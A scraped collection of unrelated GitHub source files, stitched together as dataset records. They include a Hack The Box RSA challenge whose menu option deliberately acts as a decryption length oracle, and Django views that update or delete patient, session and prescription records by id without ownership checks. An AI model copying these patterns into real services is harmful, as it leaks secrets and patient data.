%s\" % imgtype)\n \n # merge color channels\n # default roughness 0.5 for Knife: 188 (0.737) is correct sRGB for 0.5\n # all others: RED channel not used or AO - default is 0 (0.0)\n # NOTE: UE4 generated baked textures are all sRGB, even roughness etc.\n # which normally should have disabled sRGB.\n if 'Knife' in texkey:\n mergeimage = Image.new('RGB', (texsize, texsize), (188, 0, 0))\n else:\n mergeimage = Image.new('RGB', (texsize, texsize), (0, 0, 0))\n Xr, Xg, Xb = mergeimage.split()\n if 'R' in mixsuffix:\n Xg = RG\n if 'M' in mixsuffix:\n Xb = MB\n if 'O' in mixsuffix or 'S' in mixsuffix:\n Xr = OR\n\n img_final = Image.merge('RGB', (Xr, Xg, Xb))\n outfile = '{:s}/T_{:s}{:s}_{:s}.png'.format(imagesDir,\n meshes[texkey],\n texkey,\n mixsuffix)\n print(\"Saving %s map to %s\" % (mixsuffix, outfile))\n img_final.save(outfile)\n \nsys.exit(0)","repo_name":"herb64/TexJoiner","sub_path":"TexJoiner.py","file_name":"TexJoiner.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4032393975","text":"import argparse\nimport os\nimport json\nimport logging\nimport pprint\nimport re\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom utils import bd\nfrom glob import glob\n\nfrom utils.matplotlib_utils import default_rc_params, linestyles_cycle, markers_cycle, load_rc_params, set_lims\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\nlogger = logging.getLogger(__name__)\n\nx_col = 'pos_bits_per_input_point'\nrcParams = default_rc_params(rcParams)\n\n\ndef read_json(file):\n with open(file, 'r') as f:\n return json.load(f)\n\n\ndef build_curves(data, ylabel, column, filename, output_path, ylim=None, xlim=None, legend_loc='lower right',\n no_legend=False, lims=None):\n logger.info(f'Building curves with {ylabel}')\n\n data = [d.copy() for d in data]\n for d in data:\n d['reports'] = d['reports'].copy()\n fig, ax = plt.subplots()\n\n markers = markers_cycle()\n linestyles = linestyles_cycle()\n for d, marker, linestyle in zip(data, markers, linestyles):\n d['marker'] = marker\n d['linestyle'] = linestyle\n\n data_summary = []\n for d in data:\n df = d['reports']\n df['finite_mask'] = np.isfinite(df[column].values)\n logger.debug(f'{column} {df}')\n # if not np.all(data_finite):\n # data_lossless = cur_data[~data_finite]\n # data_lossless_bpp = np.min(data_lossless[:, 0])\n # ax.axvline(x=data_lossless_bpp, label='_nolegend_', linestyle=data['linestyle'])\n\n df_finite = df[df['finite_mask']]\n ax.plot(df_finite[x_col], df_finite[column],\n label=d['label'], linestyle=d['linestyle'], marker=d['marker'])\n\n for _, row in df_finite.iterrows():\n data_summary.append({'mode_id': d['mode_id'], 'label': d['label'], 'metric': column,\n 'ylabel': ylabel, 'x': row[x_col], 'y': row[column]})\n\n pd.DataFrame(data_summary).to_csv(os.path.join(output_path, filename + '_data.csv'))\n\n ax.set(xlabel='bits per input point', ylabel=ylabel)\n ax.set_xlim(left=0)\n set_lims(ax, lims)\n if not no_legend:\n ax.legend(loc=legend_loc)\n ax.locator_params(axis='x', nbins=6)\n ax.locator_params(axis='y', nbins=6)\n ax.grid(True)\n if xlim is not None:\n ax.set_xlim(xlim)\n if ylim is not None:\n ax.set_ylim(ylim)\n\n fig.tight_layout()\n for ext in ['.pdf', '.png']:\n fig.savefig(os.path.join(output_path, filename + ext))\n\n message = ''\n for bdf, bdname in zip((bd.bdrate, bd.bdsnr), ('bdrate', 'bdsnr')):\n bddf = [{'metric': column, 'mode_id': d['mode_id'], 'label': d['label']} for d in data]\n\n for i, d1 in enumerate(data):\n for j, d2 in enumerate(data):\n df1 = d1['reports']\n df1 = df1.query('bd_mask and finite_mask')\n df2 = d2['reports']\n df2 = df2.query('bd_mask and finite_mask')\n bd_result = bdf(df2[[x_col, column]].values, df1[[x_col, column]].values)\n bddf[i][d2['mode_id']] = bd_result\n bddf = pd.DataFrame(bddf)\n\n bd_str = bddf.to_string()\n message += bd_str + '\\n'\n print(bd_str)\n bddf.to_csv(os.path.join(output_path, filename + '_' + bdname + '.csv'))\n with open(os.path.join(output_path, filename + '.log'), 'w') as f:\n f.write(message)\n\n\ndef run(paths, patterns, labels, mode_ids, output_path, output_prefix, path_filter=None, modes=('d1', 'd2'),\n bd_ignore=(), no_legend=False, lims=None):\n for path in paths:\n assert os.path.exists(path), f'{path} does not exist'\n\n data = [{'reports': [{'path': gpath} for gpath in glob(os.path.join(path, pattern), recursive=True)],\n 'path': path, 'pattern': pattern, 'label': label.replace('_', ' '), 'mode_id': mode_id}\n for path, pattern, label, mode_id in zip(paths, patterns, labels, mode_ids)]\n\n # Filtering paths and data\n filtered_data = []\n for d in data:\n if path_filter is not None:\n regexp = re.compile(path_filter)\n filtered_reports = []\n else:\n filtered_reports = d['reports']\n for report in d['reports']:\n path = report['path']\n if path_filter is not None:\n mask_value = regexp.search(report)\n if not mask_value:\n logger.info(f'Ignoring {report}')\n else:\n filtered_reports.append(report)\n bd_mask_value = not any(bdi in path for bdi in bd_ignore)\n report['bd_mask'] = bd_mask_value\n if not bd_mask_value:\n logger.info(f'Ignoring {path} for BD computations')\n\n if len(filtered_reports) == 0:\n logger.info(f'Ignoring {d[\"path\"]} {d[\"pattern\"]}')\n else:\n d['reports'] = filtered_reports\n filtered_data.append(d)\n data = filtered_data\n\n for d in data:\n reports = d['reports']\n logger.info(f'reports: {reports}')\n for i in range(len(reports)):\n report = reports[i]\n json_data = read_json(report['path'])\n rkeys = set(report.keys())\n jkeys = set(json_data.keys())\n assert len(rkeys.intersection(jkeys)) == 0, f'Key conflict rkeys {rkeys} jkeys {jkeys}'\n report = {**report, **json_data}\n reports[i] = report\n reports = pd.DataFrame(data=reports)\n d['reports'] = reports.sort_values(by=x_col)\n\n curves = {\n 'd1': (output_prefix + 'rd_curve_d1', 'd1_psnr', 'D1 PSNR (dB)', 'lower right'),\n 'd2': (output_prefix + 'rd_curve_d2', 'd2_psnr', 'D2 PSNR (dB)', 'lower right')\n }\n curves = [curves[m] for m in modes]\n\n for (filename, column, ylabel, legend_loc) in curves:\n build_curves(data, ylabel, column, filename, output_path, legend_loc=legend_loc, no_legend=no_legend,\n lims=lims)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(prog='ev_compare.py', description='Gathers reports and produces summary.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--paths', help='Input paths.', nargs='+', required=True)\n parser.add_argument('--patterns', help='Search patterns (ex: **/report.json).', nargs='+', required=True)\n parser.add_argument('--labels', help='Labels.', nargs='+', required=True)\n parser.add_argument('--mode_ids', help='Identifiers.', nargs='+', required=True)\n parser.add_argument('--output_path', help='Output directory path.', required=True)\n parser.add_argument('--output_prefix', help='Prefix for output files.', default='')\n parser.add_argument('--path_filter', help='Path based result filtering.')\n parser.add_argument('--modes', help='Modes to use for output: d1, d2 or both.', default=['d1', 'd2'], nargs='+')\n parser.add_argument('--rcParams', help='Dictionary of parameters to pass to rcParams (JSON format).', type=json.loads)\n parser.add_argument('--bd_ignore', help='Ignore certain reports (usually to make BD metrics comparables).', nargs='+')\n parser.add_argument('--no_legend', help='Remove legend.', default=False, action='store_true')\n parser.add_argument('--lims', help='xmin xmax ymin ymax. None for auto.', nargs='+')\n args = parser.parse_args()\n lims = args.lims\n if lims is not None:\n lims = [None if x == 'None' else float(x) for x in lims]\n\n if args.rcParams is not None:\n logger.info('Loaded rcParams configuration')\n pprint.pprint(args.rcParams)\n rcParams = load_rc_params(args.rcParams, rcParams)\n\n run(args.paths, args.patterns, args.labels, args.mode_ids, args.output_path, args.output_prefix, args.path_filter,\n args.modes, args.bd_ignore, args.no_legend, lims)\n","repo_name":"mauriceqch/pcc_geo_cnn_v2","sub_path":"src/ev_compare.py","file_name":"ev_compare.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"31"} +{"seq_id":"74490154647","text":"import sys\nfrom pygame import *\nfrom bullet import Bullet\n\n\ndef check_keydown_events(event, ship, screen, bullets):\n if event.key == K_RIGHT:\n ship.moving_right = True\n elif event.key == K_LEFT:\n ship.moving_left = True\n elif event.key == K_SPACE:\n # создание пули и включение ее в группу bullets\n new_bullet = Bullet(screen, ship)\n bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n if event.key == K_RIGHT:\n ship.moving_right = False\n elif event.key == K_LEFT:\n ship.moving_left = False\n\n\ndef check_events(ship, screen, bullets):\n for i in event.get():\n if i.type == QUIT:\n sys.exit()\n elif i.type == KEYDOWN:\n check_keydown_events(i, ship, screen, bullets)\n elif i.type == KEYUP:\n check_keyup_events(i, ship)\n\n\ndef update_screen(settings, screen, ship, bullets):\n '''Обновляет изображение на экране и отображает новый экран'''\n screen.fill(settings.bg_color)\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n\n # отображаю последний прорисованный экран\n display.flip()\n","repo_name":"GreatRaksin/battleShip","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2063125767","text":"import os\nimport math\nfrom Crypto.Util.number import *\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\ndef get_length(pt):\n\tres = 0\n\tif (len(bin(pt)) - 2) % 8 != 0:\n\t\tres += 1\n\tres += (len(bin(pt)) - 2) // 8\n\treturn res\n\ndef ceil(a, b):\n\treturn -(-a // b)\n\nclass RSA:\n\tdef __init__(self, size):\n\n\t\tself.e = 0x10001\n\t\tself.size = size\n\n\t\tpriv = rsa.generate_private_key(\n\t\t public_exponent=self.e,\n\t\t key_size=size\n\t\t)\n\t\tpub = priv.public_key()\n\n\n\t\tself.n = pub.public_numbers().n\n\n\n\t\tself.d = priv.private_numbers().d\n\t\tself.n_size = ceil(self.size, 8)\n\t\tself.B = 2**((self.n_size-1)*8)\n\n\n\tdef pad(self, pt):\n\t\tres = 0x02 << 8 * (self.n_size - 2)\n\t\trandom_pad = os.urandom(self.n_size - 3 - get_length(pt))\n\t\tfor idx, val in enumerate(random_pad):\n\t\t\tif val == 0:\n\t\t\t\tval = 1\n\t\t\tres += val << (len(random_pad) - idx + get_length(pt)) * 8\n\t\tres += pt\n\t\treturn res\n\n\tdef encrypt(self,pt):\n\t\tpt = bytes_to_long(pt)\n\t\tpadded_pt = self.pad(pt)\n\t\tct = pow(padded_pt, self.e, self.n)\n\t\treturn long_to_bytes(ct).hex()\n\n\tdef decrypt(self,ct):\n\t\tct = bytes_to_long(ct)\n\t\tpt = pow(ct, self.d, self.n)\n\t\treturn pt\n\n\ndef main():\n\tFLAG = b'HTB{dummyflag}'\n\tsize = 1024\n\ttmp = RSA(size)\n\tflag = tmp.encrypt(FLAG)\n\twhile True:\n\t\ttry:\n\t\t\tprint('Please choose:\\n'+\\\n\t\t\t\t\t\t'1. Get public key.\\n'+\\\n\t\t\t\t\t\t'2. Get encrypted flag.\\n'+\\\n\t\t\t\t\t\t'3. Get length.\\n'+\\\n\t\t\t\t\t\t'> ')\n\t\t\topt = input()\n\n\t\t\tif opt == '1':\n\t\t\t\tpub_key = (hex(tmp.n)[2:], hex(tmp.e)[2:])\n\t\t\t\tprint('(n,e): ' + str(pub_key) + '\\n')\n\t\t\telif opt == '2':\n\t\t\t\tprint('Encrypted text: ' + flag + '\\n')\n\t\t\telif opt == '3':\n\t\t\t\tprint('Provide a ciphertext:\\n'+\\\n\t\t\t\t\t\t\t'> ')\n\t\t\t\tct = input()\n\t\t\t\tct = bytes.fromhex(ct)\n\t\t\t\tpt = tmp.decrypt(ct)\n\t\t\t\tlength = get_length(pt)\n\t\t\t\tprint('Length: ' + str(length) + '\\n')\n\t\t\telse:\n\t\t\t\tprint('Wrong option!\\n')\n\t\t\t\texit(1)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('Invalid Input. Exit!')\n\t\t\texit(1)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apehex/ctf","sub_path":"hackthebox/challenges/crypto/oracle-leaks/sources/chall.py","file_name":"chall.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21125409867","text":"from django.http import Http404\nfrom django.contrib.auth import authenticate\nfrom rest_framework import status, generics\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom exercise.serializers import ExerciseSerializer, ExerciseCreateSerializer\nfrom exercise.models import Exercise\nfrom patient.serializers import PatientSerializer, PatientCreateSerializer\nfrom patient.models import Patient\nfrom session.serializers import SessionSerializer\nfrom session.models import Session\nfrom prescription.models import Prescription\nfrom prescription.serializers import PrescriptionSerializer\nfrom utils.auth import (\n get_doctor_from_token,\n)\nfrom .serializers import DoctorLoginSerializer, DoctorSerializer\nfrom .models import Doctor\n\n\nclass DoctorLoginView(APIView):\n serializer_class = DoctorLoginSerializer\n pagination_class = PageNumberPagination\n\n def post(self, request):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n user = authenticate(username=username, password=password)\n doctors = Doctor.objects.filter(user=user)\n patient = Patient.objects.filter(user=user)\n if len(doctors) > 0:\n refresh = RefreshToken.for_user(user)\n return Response(\n {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n \"user_id\": user.id,\n \"is_doctor\": True,\n }\n )\n elif len(patient) > 0:\n refresh = RefreshToken.for_user(user)\n return Response(\n {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n \"user_id\": user.id,\n \"is_doctor\": False,\n }\n )\n else:\n return Response(\n {\"error\": \"Invalid credentials\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\n@api_view([\"GET\", \"PATCH\", \"POST\", \"DELETE\"])\ndef doctor_profile(request):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n\n if request.method == \"GET\":\n serializer = DoctorSerializer(doctor)\n return Response(serializer.data)\n\n if request.method == \"POST\":\n serializer = DoctorSerializer(doctor, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"PATCH\":\n return Response(\n {\"error\": \"Use POST method to update your profile.\"},\n status=status.HTTP_405_METHOD_NOT_ALLOWED,\n )\n\n if request.method == \"DELETE\":\n doctor.delete()\n return Response(\n {\"message\": \"Profile deleted successfully.\"}, status=status.HTTP_200_OK\n )\n\n\nclass DoctorPatients(generics.RetrieveAPIView):\n queryset = Doctor.objects.all()\n serializer_class = DoctorSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n patients = doctor.patients.all()\n serializer = PatientSerializer(patients, many=True)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass DoctorPatientDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update or delete a patient's details.\n \"\"\"\n\n queryset = Patient.objects.all()\n serializer_class = PatientSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n sessions = Patient.objects.filter(\n patient__doctor=doctor, id=kwargs[\"pk\"]\n )\n sessions = sessions[0]\n serializer = PatientSerializer(sessions)\n return Response(serializer.data)\n except Patient.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n\n def put(self, request, pk):\n \"\"\"\n Update a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n session = Patient.objects.get(id=pk)\n serializer = PatientSerializer(session, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n \"\"\"\n Delete a patient's details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n session = Patient.objects.get(id=pk)\n session.delete()\n return Response(\n {\"message\": \"Patient deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Patient.DoesNotExist:\n raise Http404\n\n\nclass DoctorMe(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve their own details.\n \"\"\"\n\n serializer_class = DoctorSerializer\n\n def get(self, request):\n \"\"\"\n Retrieve a doctor's own details.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n serializer = DoctorSerializer(doctor)\n return Response(serializer.data)\n\n\nclass AddSession(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to add a session.\n \"\"\"\n\n serializer_class = SessionSerializer\n\n def post(self, request):\n \"\"\"\n Add a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n serializer = SessionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass DoctorSessions(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve their own sessions.\n \"\"\"\n\n queryset = Session.objects.all()\n serializer_class = SessionSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve a doctor's own sessions.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n sessions = Session.objects.filter(patient__doctor=doctor)\n serializer = SessionSerializer(sessions, many=True)\n return Response(serializer.data)\n\n\nclass DoctorSessionsDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update or delete a session.\n \"\"\"\n\n queryset = Session.objects.all()\n serializer_class = SessionSerializer\n pagination_class = PageNumberPagination\n\n def get(self, request, pk):\n \"\"\"\n Retrieve a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n sessions = Session.objects.filter(patient__doctor=doctor, id=pk)\n sessions = sessions[0]\n serializer = SessionSerializer(sessions)\n return Response(serializer.data)\n except Session.DoesNotExist:\n raise Http404\n\n def patch(self, request, pk):\n \"\"\"\n Update a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n session = Session.objects.get(id=pk)\n serializer = SessionSerializer(session, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n \"\"\"\n Delete a session.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n try:\n session = Session.objects.get(id=pk)\n session.delete()\n return Response(\n {\"message\": \"Session deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Session.DoesNotExist:\n raise Http404\n\n\nclass DoctorExercises(generics.RetrieveAPIView):\n pagination_class = PageNumberPagination\n queryset = Exercise.objects.all()\n serializer_class = ExerciseSerializer\n\n def get(self, request):\n doctor = get_doctor_from_token(request)\n if not isinstance(doctor, Doctor):\n return doctor\n exercise = Exercise.objects.filter(owner=doctor)\n serializer = ExerciseSerializer(exercise, many=True)\n return Response(serializer.data)\n\n\nclass DoctorExerciseDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update, or delete an exercise.\n\n get:\n Retrieve an exercise instance.\n\n patch:\n Update an exercise instance.\n\n delete:\n Delete an exercise instance.\n \"\"\"\n\n pagination_class = PageNumberPagination\n queryset = Exercise.objects.all()\n serializer_class = ExerciseSerializer\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized exercise instance.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n exercise = Exercise.objects.filter(owner=doctor, id=kwargs[\"pk\"])\n if len(exercise) == 0:\n return Response({\"error\": \"permission denied\"})\n exercise = exercise[0]\n serializer = ExerciseSerializer(exercise)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def patch(self, request, *args, **kwargs):\n \"\"\"\n Update an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized exercise instance if the update is successful,\n or a Response object containing the errors if the update is unsuccessful.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n exercise = Exercise.objects.get(id=kwargs[\"pk\"])\n serializer = ExerciseSerializer(exercise, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Delete an exercise instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing a success message if the deletion is successful,\n or a Http404 exception if the exercise instance does not exist.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n exercise = Exercise.objects.get(id=kwargs[\"pk\"])\n exercise.delete()\n\n return Response(\n {\"message\": \"exercise deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Exercise.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass AddPatient(generics.CreateAPIView):\n serializer_class = PatientSerializer\n\n def post(self, request):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n request.data[\"doctor\"] = doctor.id\n serializer = PatientCreateSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n patient = Patient.objects.get(phone_number=serializer.data[\"phone_number\"])\n print(patient,'-----------------------')\n return Response(PatientSerializer(patient).data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass AddExercise(generics.CreateAPIView):\n \"\"\"\n API endpoint to add a new exercise for a doctor.\n\n Methods:\n --------\n post(request):\n Add a new exercise for the authenticated doctor.\n\n Attributes:\n -----------\n serializer_class: ExerciseCreateSerializer\n Serializer class for creating a new exercise.\n \"\"\"\n\n serializer_class = ExerciseCreateSerializer\n\n def post(self, request):\n \"\"\"\n Add a new exercise for the authenticated doctor.\n\n Parameters:\n -----------\n request: Request\n HTTP request object.\n\n Returns:\n --------\n Response:\n HTTP response object.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n request.data[\"owner\"] = doctor.id\n serializer = ExerciseSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass SessionDate(generics.RetrieveAPIView):\n \"\"\"\n API endpoint that returns all sessions for a specific date for a doctor's patients.\n\n Args:\n request (HttpRequest): The HTTP request object.\n date (str): The date for which sessions are to be retrieved.\n\n Returns:\n Response: A JSON response containing the serialized session data.\n \"\"\"\n\n serializer_class = SessionSerializer\n\n def get(self, request, *args, **kwargs):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n sessions = Session.objects.filter(\n patient__doctor=doctor, date=kwargs[\"date\"]\n )\n serializer = SessionSerializer(sessions, many=True)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\nclass AddPrescription(generics.CreateAPIView):\n serializer_class = PrescriptionSerializer\n\n def post(self, request):\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor):\n serializer = PrescriptionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n\nclass DoctorPrescriptionDetails(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows a doctor to retrieve, update, or delete an Prescription.\n\n get:\n Retrieve an Prescription instance.\n\n patch:\n Update an Prescription instance.\n\n delete:\n Delete an Prescription instance.\n \"\"\"\n\n pagination_class = PageNumberPagination\n queryset = Prescription.objects.all()\n serializer_class = PrescriptionSerializer\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Retrieve an prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized prescription instance.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n prescription = Prescription.objects.filter(owner=doctor, id=kwargs[\"pk\"])\n if len(prescription) == 0:\n return Response({\"error\": \"permission denied\"})\n prescription = prescription[0]\n serializer = PrescriptionSerializer(prescription)\n return Response(serializer.data)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def patch(self, request, *args, **kwargs):\n \"\"\"\n Update an Prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing the serialized Prescription instance if the update is successful,\n or a Response object containing the errors if the update is unsuccessful.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n prescription = Prescription.objects.get(id=kwargs[\"pk\"])\n serializer = PrescriptionSerializer(prescription, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"permission denied\"})\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Delete an Prescription instance.\n\n Args:\n request: The HTTP request.\n args: Additional arguments.\n kwargs: Additional keyword arguments.\n\n Returns:\n A Response object containing a success message if the deletion is successful,\n or a Http404 exception if the Prescription instance does not exist.\n \"\"\"\n doctor = get_doctor_from_token(request)\n if isinstance(doctor, Doctor) is False:\n return doctor\n if isinstance(doctor, Doctor):\n try:\n prescription = Prescription.objects.get(id=kwargs[\"pk\"])\n prescription.delete()\n\n return Response(\n {\"message\": \"prescription deleted successfully.\"},\n status=status.HTTP_200_OK,\n )\n except Prescription.DoesNotExist:\n raise Http404\n else:\n return Response({\"error\": \"permission denied\"})\n","repo_name":"MohammadrezaAmani/ThritaTech","sub_path":"doctor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"71825121367","text":"from ..models import Block\r\nfrom ..models import Phase\r\nfrom ..models import DrawingStatus\r\nfrom ..models import Department\r\nfrom ..models import Discipline\r\nfrom ..models import DrawingKind\r\nfrom ..models import Drawing\r\nfrom ..models import Revision\r\nfrom ..models import Comment\r\nfrom ..models import Reply\r\nfrom ..models import Project\r\n\r\nimport os\r\nimport datetime\r\nfrom django.utils import timezone\r\nimport pytz\r\n\r\nlocation = os.path.dirname(os.path.realpath(__file__))\r\nblock_file = 'blocks.csv'\r\nphase_file = 'phases.csv'\r\nproject_file = 'projects.csv'\r\ndepartment_file = 'departments.csv'\r\ndiscipline_file = 'disciplines.csv'\r\ndrawing_file = 'drawings.csv'\r\ndrawing_kinds_file = 'drawing_kinds.csv'\r\ndrawing_status_file = 'drawing_statuses.csv'\r\nexpected_dates_file = 'expected_drawing_dates.csv'\r\n\r\ndef available():\r\n print('\\n{}:'.format(location))\r\n for f in os.listdir(location):\r\n if os.path.isfile(os.path.join(location, f)):\r\n print(' -> {}'.format(f))\r\n\r\n\r\ndef _pack_info(keys, info_raw):\r\n info = {}\r\n for line in info_raw:\r\n items = line.split(',')\r\n for i, key in enumerate(keys):\r\n try:\r\n info[key].append(items[i].strip().lower())\r\n except KeyError:\r\n info[key] = []\r\n return info\r\n\r\n\r\ndef _parse_file(name=None, headers=True):\r\n if not name:\r\n return None\r\n file_path = os.path.join(location, name)\r\n with open(file_path, 'r') as f:\r\n info_raw = [line.strip('\\n').strip() for line in f\\\r\n if line.strip('\\n').strip() != '']\r\n\r\n if headers:\r\n head_raw = info_raw.pop(0)\r\n head = [item.strip().lower() for item in head_raw.split(',')]\r\n return _pack_info(head, info_raw)\r\n else:\r\n fhead = name.split('.')[0]\r\n info = {fhead:[]}\r\n for line in info_raw:\r\n info[fhead].append(line.strip().lower())\r\n return info\r\n\r\n\r\ndef add_blocks():\r\n print('Populating Blocks...')\r\n info = _parse_file(name=block_file, headers=False)\r\n keyval = block_file.split('.')[0]\r\n already = Block.objects.all()\r\n prev = [block.name for block in already]\r\n added = len(prev)\r\n test = set(prev)\r\n print('->> Total already in: {}'.format(added))\r\n for item in info[keyval]:\r\n 